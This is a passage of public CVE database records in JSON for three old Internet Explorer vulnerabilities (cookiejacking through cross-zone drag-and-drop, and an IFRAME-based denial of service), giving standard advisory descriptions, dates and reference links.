"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-05-20T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-12T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2383",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"refsource": "MS",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2383",
"datePublished": "2011-06-03T17:00:00",
"dateReserved": "2011-06-03T00:00:00",
"dateUpdated": "2024-08-06T23:00:33.783Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2382 (GCVE-0-2011-2382)
Vulnerability from nvd – Published: 2011-06-03 17:00 – Updated: 2024-09-17 02:41
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-06-03T17:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2382",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2382",
"datePublished": "2011-06-03T17:00:00Z",
"dateReserved": "2011-06-03T00:00:00Z",
"dateUpdated": "2024-09-17T02:41:25.100Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-2118 (GCVE-0-2010-2118)
Vulnerability from nvd – Published: 2010-06-01 20:00 – Updated: 2024-08-07 02:25
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:25:06.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-2118",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4238/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-2118",
"datePublished": "2010-06-01T20:00:00",
"dateReserved": "2010-06-01T00:00:00",
"dateUpdated": "2024-08-07T02:25:06.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}